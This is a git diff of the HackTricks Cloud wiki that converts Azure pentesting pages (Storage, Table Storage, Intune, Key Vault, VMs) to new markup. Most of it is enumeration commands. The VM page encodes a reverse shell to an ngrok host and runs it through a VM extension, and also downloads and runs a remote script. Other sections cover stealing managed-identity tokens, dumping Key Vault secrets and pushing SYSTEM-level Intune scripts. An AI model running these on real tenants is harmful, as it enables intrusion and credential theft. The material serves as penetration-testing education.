   --as-user --auth-mode login \
   -n 
-  
+
 ## Generate account SAS
 az storage account generate-sas \
   --expiry 2024-12-31T23:59:00Z \
@@ -353,11 +338,11 @@ az storage account local-user list \
   --account-name  \
   --resource-group 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Az PowerShell" }}
+
 ```powershell
 # Get storage accounts
 Get-AzStorageAccount | fl
@@ -415,51 +400,38 @@ New-AzStorageBlobSASToken `
   -Permission racwdl `
   -ExpiryTime (Get-Date "2024-12-31T23:59:00Z")
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ### File Shares
 
-{% content-ref url="az-file-shares.md" %}
-[az-file-shares.md](az-file-shares.md)
-{% endcontent-ref %}
+{{#ref}}
+az-file-shares.md
+{{#endref}}
 
 ## Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %}
-[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-storage-privesc.md
+{{#endref}}
 
 ## Post Exploitation
 
-{% content-ref url="../az-post-exploitation/az-blob-storage-post-exploitation.md" %}
-[az-blob-storage-post-exploitation.md](../az-post-exploitation/az-blob-storage-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-blob-storage-post-exploitation.md
+{{#endref}}
 
 ## Persistence
 
-{% content-ref url="../az-persistence/az-storage-persistence.md" %}
-[az-storage-persistence.md](../az-persistence/az-storage-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-persistence/az-storage-persistence.md
+{{#endref}}
 
 ## References
 
-* [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)
-* [https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview)
-* [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
+- [https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction](https://learn.microsoft.com/en-us/azure/storage/blobs/storage-blobs-introduction)
+- [https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview](https://learn.microsoft.com/en-us/azure/storage/common/storage-sas-overview)
+- [https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support](https://learn.microsoft.com/en-us/azure/storage/blobs/secure-file-transfer-protocol-support)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md
new file mode 100644
index 000000000..33e727ab4
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md
@@ -0,0 +1,109 @@
+# Az - Table Storage
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications.
+
+There **isn't built-in backup mechanism** for table storage.
+
+### Keys
+
+#### **PartitionKey**
+
+- The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability.
+- Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`.
+
+#### **RowKey**
+
+- The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier.
+- Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`.
+
+#### **Other Properties (Custom Properties)**
+
+- Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database.
+- Properties are stored as **key-value pairs**.
+- Example: `Name`, `Age`, `Title` could be custom properties for an employee.
+
+## Enumeration
+
+{{#tabs}}
+{{#tab name="az cli"}}
+
+```bash
+# Get storage accounts
+az storage account list
+
+# List tables
+az storage table list --account-name 
+
+# Read table
+az storage entity query \
+  --account-name  \
+  --table-name  \
+  --top 10
+
+# Write table
+az storage entity insert \
+  --account-name  \
+  --table-name  \
+  --entity PartitionKey= RowKey= =
+
+# Write example
+az storage entity insert \
+  --account-name mystorageaccount \
+  --table-name mytable \
+  --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager"
+
+# Update row
+az storage entity merge \
+  --account-name mystorageaccount \
+  --table-name mytable \
+  --entity PartitionKey=pk1 RowKey=rk1 Age=31
+```
+
+{{#endtab}}
+{{#tab name="PowerShell"}}
+
+```powershell
+# Get storage accounts
+Get-AzStorageAccount
+
+# List tables
+Get-AzStorageTable -Context (Get-AzStorageAccount -Name  -ResourceGroupName ).Context
+```
+
+{{#endtab}}
+{{#endtabs}}
+
+> [!NOTE]
+> By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`.
+
+> [!TIP]
+> Use the param `--account-key` to indicate the account key to use\
+> Use the param `--sas-token` with the SAS token to access via a SAS token
+
+## Privilege Escalation
+
+Same as storage privesc:
+
+{{#ref}}
+../az-privilege-escalation/az-storage-privesc.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../az-post-exploitation/az-table-storage-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+Same as storage persistence:
+
+{{#ref}}
+../az-persistence/az-storage-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/azure-security/az-services/intune.md b/src/pentesting-cloud/azure-security/az-services/intune.md
new file mode 100644
index 000000000..1f9181bb6
--- /dev/null
+++ b/src/pentesting-cloud/azure-security/az-services/intune.md
@@ -0,0 +1,31 @@
+# Az - Intune
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network.
+
+## Cloud -> On-Prem
+
+A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\
+The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script.
+
+```powershell
+Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
+```
+
+1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT
+2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune
+3. Go to **Scripts** and click on **Add** for Windows 10.
+4. Add a **Powershell script**
+   - ![](<../../../images/image (264).png>)
+5. Specify **Add all users** and **Add all devices** in the **Assignments** page.
+
+The execution of the script can take up to **one hour**.
+
+## References
+
+- [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/keyvault.md b/src/pentesting-cloud/azure-security/az-services/keyvault.md
similarity index 65%
rename from pentesting-cloud/azure-security/az-services/keyvault.md
rename to src/pentesting-cloud/azure-security/az-services/keyvault.md
index f49f1fb4f..eca97c105 100644
--- a/pentesting-cloud/azure-security/az-services/keyvault.md
+++ b/src/pentesting-cloud/azure-security/az-services/keyvault.md
@@ -1,19 +1,6 @@
 # Az - Key Vault
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -27,31 +14,31 @@ The **URL format** for **vaults** is `https://{vault-name}.vault.azure.net/{obje
 
 Where:
 
-* `vault-name` is the globally **unique** name of the key vault
-* `object-type` can be "keys", "secrets" or "certificates"
-* `object-name` is **unique** name of the object within the key vault
-* `object-version` is system generated and optionally used to address a **unique version of an object**.
+- `vault-name` is the globally **unique** name of the key vault
+- `object-type` can be "keys", "secrets" or "certificates"
+- `object-name` is **unique** name of the object within the key vault
+- `object-version` is system generated and optionally used to address a **unique version of an object**.
 
 In order to access to the secrets stored in the vault it's possible to select between 2 permissions models when creating the vault:
 
-* **Vault access policy**
-* **Azure RBAC** (most common and recommended)
-  * You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault)
+- **Vault access policy**
+- **Azure RBAC** (most common and recommended)
+  - You can find all the granular permissions supported in [https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault](https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/security#microsoftkeyvault)
 
 ### Access Control 
 
 Access to a Key Vault resource is controlled by two planes:
 
-* The **management plane**, whose target is [management.azure.com](http://management.azure.com/).
-  * It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported.
-* The **data plane**, whose target is **`.vault.azure.com`**.
-  * It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**.
+- The **management plane**, whose target is [management.azure.com](http://management.azure.com/).
+  - It's used to manage the key vault and **access policies**. Only Azure role based access control (**RBAC**) is supported.
+- The **data plane**, whose target is **`.vault.azure.com`**.
+  - It's used to manage and access the **data** (keys, secrets and certificates) **in the key vault**. This supports **key vault access policies** or Azure **RBAC**.
 
 A role like **Contributor** that has permissions in the management place to manage access policies can get access to the secrets by modifying the access policies.
 
 ### Key Vault RBAC Built-In Roles 
 
-

+

 
 ### Network Access
 
@@ -75,9 +62,9 @@ However, it's possible to create a vault with **purge protection disabled** whic
 
 ## Enumeration
 
-{% tabs %}
-{% tab title="az" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="az" }}
+
 ```bash
 # List all Key Vaults in the subscription
 az keyvault list
@@ -105,11 +92,11 @@ az keyvault secret show --vault-name  --name 
 # Get old versions secret value
 az keyvault secret show --id https://.vault.azure.net/secrets//
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Az Powershell" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+
+{{#tab name="Az Powershell" }}
+
 ```powershell
 # Get keyvault token
 curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
@@ -133,10 +120,11 @@ Get-AzKeyVault -VaultName  -InRemovedState
 # Get secret values
 Get-AzKeyVaultSecret -VaultName  -Name  -AsPlainText
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="az script" %}
+{{#endtab }}
+
+{{#tab name="az script" }}
+
 ```bash
 #!/bin/bash
 
@@ -177,32 +165,20 @@ do
   done
 done
 ```
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 ## Privilege Escalation
 
-{% content-ref url="../az-privilege-escalation/az-key-vault-privesc.md" %}
-[az-key-vault-privesc.md](../az-privilege-escalation/az-key-vault-privesc.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-privilege-escalation/az-key-vault-privesc.md
+{{#endref}}
 
 ## Post Exploitation
 
-{% content-ref url="../az-post-exploitation/az-key-vault-post-exploitation.md" %}
-[az-key-vault-post-exploitation.md](../az-post-exploitation/az-key-vault-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../az-post-exploitation/az-key-vault-post-exploitation.md
+{{#endref}}
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/azure-security/az-services/vms/README.md b/src/pentesting-cloud/azure-security/az-services/vms/README.md
similarity index 80%
rename from pentesting-cloud/azure-security/az-services/vms/README.md
rename to src/pentesting-cloud/azure-security/az-services/vms/README.md
index ad081b59a..58e6c2afc 100644
--- a/pentesting-cloud/azure-security/az-services/vms/README.md
+++ b/src/pentesting-cloud/azure-security/az-services/vms/README.md
@@ -1,27 +1,14 @@
 # Az - Virtual Machines & Network
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Azure Networking Basic Info
 
 Azure networks contains **different entities and ways to configure it.** You can find a brief **descriptions,** **examples** and **enumeration** commands of the different Azure network entities in:
 
-{% content-ref url="az-azure-network.md" %}
-[az-azure-network.md](az-azure-network.md)
-{% endcontent-ref %}
+{{#ref}}
+az-azure-network.md
+{{#endref}}
 
 ## VMs Basic information
 
@@ -29,46 +16,46 @@ Azure Virtual Machines (VMs) are flexible, on-demand **cloud-based servers that
 
 ### Security Configurations
 
-* **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
-* **Security Type**:
-  * **Standard Security**: This is the default security type that does not require any specific configuration.
-  * **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
-  * **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
-* **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.**
-* **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key.
-  * It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
-* **NIC network security group**:
-  * **None**: Basically opens every port
-  * **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
-  * **Advanced**: Select a security group
-* **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day)
-* **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
-* **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
-  * Percentage CPU is greater than 80%
-  * Available Memory Bytes is less than 1GB
-  * Data Disks IOPS Consumed Percentage is greater than 95%
-  * OS IOPS Consumed Percentage is greater than 95%
-  * Network in Total is greater than 500GB
-  * Network Out Total is greater than 200GB
-  * VmAvailabilityMetric is less than 1
-* **Heath monitor**: By default check protocol HTTP in port 80
-* **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock).
-  * Most VM related resources **also support locks** like disks, snapshots...
-  * Locks can also be applied at **resource group and subscription levels**
+- **Availability Zones**: Availability zones are distinct groups of datacenters within a specific Azure region which are physically separated to minimize the risk of multiple zones being affected by local outages or disasters.
+- **Security Type**:
+  - **Standard Security**: This is the default security type that does not require any specific configuration.
+  - **Trusted Launch**: This security type enhances protection against boot kits and kernel-level malware by using Secure Boot and Virtual Trusted Platform Module (vTPM).
+  - **Confidential VMs**: On top of a trusted launch, it offers hardware-based isolation between the VM, hypervisor and host management, improves the disk encryption and [**more**](https://learn.microsoft.com/en-us/azure/confidential-computing/confidential-vm-overview)**.**
+- **Authentication**: By default a new **SSH key is generated**, although it's possible to use a public key or use a previous key and the username by default is **azureuser**. It's also possible to configure to use a **password.**
+- **VM disk encryption:** The disk is encrypted at rest by default using a platform managed key.
+  - It's also possible to enable **Encryption at host**, where the data will be encrypted in the host before sending it to the storage service, ensuring an end-to-end encryption between the host and the storage service ([**docs**](https://learn.microsoft.com/en-gb/azure/virtual-machines/disk-encryption#encryption-at-host---end-to-end-encryption-for-your-vm-data)).
+- **NIC network security group**:
+  - **None**: Basically opens every port
+  - **Basic**: Allows to easily open the inbound ports HTTP (80), HTTPS (443), SSH (22), RDP (3389)
+  - **Advanced**: Select a security group
+- **Backup**: It's possible to enable **Standard** backup (one a day) and **Enhanced** (multiple per day)
+- **Patch orchestration options**: This enable to automatically apply patches in the VMs according to the selected policy as described in the [**docs**](https://learn.microsoft.com/en-us/azure/virtual-machines/automatic-vm-guest-patching).
+- **Alerts**: It's possible to automatically get alerts by email or mobile app when something happen in the VM. Default rules:
+  - Percentage CPU is greater than 80%
+  - Available Memory Bytes is less than 1GB
+  - Data Disks IOPS Consumed Percentage is greater than 95%
+  - OS IOPS Consumed Percentage is greater than 95%
+  - Network in Total is greater than 500GB
+  - Network Out Total is greater than 200GB
+  - VmAvailabilityMetric is less than 1
+- **Heath monitor**: By default check protocol HTTP in port 80
+- **Locks**: It allows to lock a VM so it can only be read (**ReadOnly** lock) or it can be read and updated but not deleted (**CanNotDelete** lock).
+  - Most VM related resources **also support locks** like disks, snapshots...
+  - Locks can also be applied at **resource group and subscription levels**
 
 ## Disks & snapshots
 
-* It's possible to **enable to attach a disk to 2 or more VMs**
-* By default every disk is **encrypted** with a platform key.
-  * Same in snapshots
-* By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access.
-  * Same in snapshots
-* It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not
-  * Same in snapshots
+- It's possible to **enable to attach a disk to 2 or more VMs**
+- By default every disk is **encrypted** with a platform key.
+  - Same in snapshots
+- By default it's possible to **share the disk from all networks**, but it can also be **restricted** to only certain **private acces**s or to **completely disable** public and private access.
+  - Same in snapshots
+- It's possible to **generate a SAS URI** (of max 60days) to **export the disk**, which can be configured to require authentication or not
+  - Same in snapshots
+
+{{#tabs}}
+{{#tab name="az cli"}}
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
 ```bash
 # List all disks
 az disk list --output table
@@ -76,11 +63,10 @@ az disk list --output table
 # Get info about a disk
 az disk show --name  --resource-group 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+{{#tab name="PowerShell"}}
+
 ```powershell
 # List all disks
 Get-AzDisk
@@ -88,9 +74,9 @@ Get-AzDisk
 # Get info about a disk
 Get-AzDisk -Name  -ResourceGroupName 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab}}
+{{#endtabs}}
 
 ## Images, Gallery Images & Restore points
 
@@ -99,9 +85,9 @@ Images can be managed in the **Images section** of Azure or inside **Azure compu
 
 A **restore point** stores the VM configuration and **point-in-time** application-consistent **snapshots of all the managed disks** attached to the VM. It's related to the VM and its purpose is to be able to restore that VM to how it was in that specific point in it.
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs}}
+{{#tab name="az cli"}}
+
 ```bash
 # Shared Image Galleries | Compute Galleries
 ## List all galleries and get info about one
@@ -112,19 +98,19 @@ az sig show --gallery-name  --resource-group 
 az sig list-community --output table
 
 ## List galleries shaerd with me
-az sig list-shared --location  --output table 
+az sig list-shared --location  --output table
 
 ## List all image definitions in a gallery and get info about one
 az sig image-definition list --gallery-name  --resource-group  --output table
 az sig image-definition show --gallery-image-definition  --gallery-name  --resource-group 
 
-## List all the versions of an image definition in a gallery 
+## List all the versions of an image definition in a gallery
 az sig image-version list --gallery-image-name  --gallery-name  --resource-group  --resource-group  --output table
 
-# Images 
+# Images
 # List all managed images in your subscription
 az image list --output table
 
@@ -133,11 +119,10 @@ az image list --output table
 az restore-point collection list-all --output table
 az restore-point collection show --collection-name  --resource-group 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+{{#tab name="PowerShell"}}
+
 ```powershell
 ## List all galleries and get info about one
 Get-AzGallery
@@ -147,13 +132,13 @@ Get-AzGallery -Name  -ResourceGroupName 
 Get-AzGalleryImageDefinition -GalleryName  -ResourceGroupName 
 Get-AzGalleryImageDefinition -GalleryName  -ResourceGroupName  -Name 
 
-## List all the versions of an image definition in a gallery 
+## List all the versions of an image definition in a gallery
 Get-AzGalleryImageVersion -GalleryImageDefinitionName  -GalleryName  -ResourceGroupName 
 
 ## List all VM applications inside a gallery
 Get-AzGalleryApplication -GalleryName  -ResourceGroupName 
 
-# Images 
+# Images
 # List all managed images in your subscription
 Get-AzImage -Name  -ResourceGroupName 
 
@@ -161,9 +146,9 @@ Get-AzImage -Name  -ResourceGroupName 
 ## List all restore points and get info about 1
 Get-AzRestorePointCollection -Name  -ResourceGroupName 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab}}
+{{#endtabs}}
 
 ## Azure Site Recovery
 
@@ -177,9 +162,9 @@ The Bastion deploys a subnet called **`AzureBastionSubnet`** with a `/26` netmas
 
 To list all Azure Bastion Hosts in your subscription and connect to VMs through them, you can use the following commands:
 
-{% tabs %}
-{% tab title="az cli" %}
-{% code overflow="wrap" %}
+{{#tabs}}
+{{#tab name="az cli"}}
+
 ```bash
 # List bastions
 az network bastion list -o table
@@ -202,18 +187,17 @@ az network bastion rdp \
   --username  \
   --password 
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab}}
+{{#tab name="PowerShell"}}
+
 ```powershell
 # List bastions
 Get-AzBastion
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab}}
+{{#endtabs}}
 
 ## Metadata
 
@@ -223,11 +207,12 @@ Moreover, to contact the metadata endpoint, the HTTP request must have the heade
 
 Check how to enumerate it in:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm
+{{#endref}}
 
 ## VM Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # VMs
 ## List all VMs and get info about one
@@ -275,19 +260,19 @@ az sig show --gallery-name  --resource-group 
 az sig list-community --output table
 
 ## List galleries shared with me
-az sig list-shared --location  --output table 
+az sig list-shared --location  --output table
 
 ## List all image definitions in a gallery and get info about one
 az sig image-definition list --gallery-name  --resource-group  --output table
 az sig image-definition show --gallery-image-definition  --gallery-name  --resource-group 
 
-## List all the versions of an image definition in a gallery 
+## List all the versions of an image definition in a gallery
 az sig image-version list --gallery-image-name  --gallery-name  --resource-group  --resource-group  --output table
 
-# Images 
+# Images
 # List all managed images in your subscription
 az image list --output table
 
@@ -363,9 +348,6 @@ az resource list --resource-type "Microsoft.Compute/virtualMachines" --query "[]
 # List all available run commands for virtual machines
 az vm run-command list --output table
 ```
-{% endcode %}
-
-
 
 ```powershell
 # Get readable VMs
@@ -385,6 +367,7 @@ Get-AzVMExtension -ResourceGroupName  -VMName 
 Get-AzVM | select -ExpandProperty NetworkProfile # Get name of network connector of VM
 Get-AzNetworkInterface -Name  # Get info of network connector (like IP)
 
+
 # Disks
 ## List all disks and get info about one
 Get-AzDisk
@@ -403,13 +386,13 @@ Get-AzSnapshot -Name  -ResourceGroupName 
 Get-AzGalleryImageDefinition -GalleryName  -ResourceGroupName 
 Get-AzGalleryImageDefinition -GalleryName  -ResourceGroupName  -Name 
 
-## List all the versions of an image definition in a gallery 
+## List all the versions of an image definition in a gallery
 Get-AzGalleryImageVersion -GalleryImageDefinitionName  -GalleryName  -ResourceGroupName 
 
 ## List all VM applications inside a gallery
 Get-AzGalleryApplication -GalleryName  -ResourceGroupName 
 
-# Images 
+# Images
 # List all managed images in your subscription
 Get-AzImage -Name  -ResourceGroupName 
 
@@ -423,7 +406,7 @@ Get-AzBastion
 
 # Network
 ## List all VNets in your subscription
-Get-AzVirtualNetwork 
+Get-AzVirtualNetwork
 
 ## List VNet peering connections for a given VNet
 (Get-AzVirtualNetwork -ResourceGroupName  -Name ).VirtualNetworkPeerings
@@ -455,6 +438,7 @@ Get-AzStorageAccount
 
 ## List all custom script extensions on a specific VM
 Get-AzVMExtension -VMName  -ResourceGroupName 
+
 ```
 
 ## Code Execution in VMs
@@ -469,9 +453,9 @@ The required permission is **`Microsoft.Compute/virtualMachines/extensions/write
 
 It's possible to list all the available extensions with:
 
-{% tabs %}
-{% tab title="Az Cli" %}
-{% code overflow="wrap" %}
+{{#tabs }}
+{{#tab name="Az Cli" }}
+
 ```bash
 # It takes some mins to run
 az vm extension image list --output table
@@ -479,26 +463,25 @@ az vm extension image list --output table
 # Get extensions by publisher
 az vm extension image list --publisher "Site24x7" --output table
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="PowerShell" %}
-{% code overflow="wrap" %}
+{{#endtab }}
+{{#tab name="PowerShell" }}
+
 ```powershell
 # It takes some mins to run
 Get-AzVMExtensionImage -Location  -PublisherName  -Type 
 ```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
+
+{{#endtab }}
+{{#endtabs }}
 
 It's possible to **run custom extensions that runs custom code**:
 
-{% tabs %}
-{% tab title="Linux" %}
-* Execute a revers shell
+{{#tabs }}
+{{#tab name="Linux" }}
+
+- Execute a revers shell
 
-{% code overflow="wrap" %}
 ```bash
 # Prepare the rev shell
 echo -n 'bash -i  >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64
@@ -514,11 +497,9 @@ az vm extension set \
   --settings '{}' \
   --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}'
 ```
-{% endcode %}
 
-* Execute a script located on the internet
+- Execute a script located on the internet
 
-{% code overflow="wrap" %}
 ```bash
 az vm extension set \
   --resource-group rsc-group> \
@@ -529,13 +510,13 @@ az vm extension set \
   --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \
   --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}'
 ```
-{% endcode %}
-{% endtab %}
 
-{% tab title="Windows" %}
-* Execute a reverse shell
+{{#endtab }}
+
+{{#tab name="Windows" }}
+
+- Execute a reverse shell
 
-{% code overflow="wrap" %}
 ```bash
 # Get encoded reverse shell
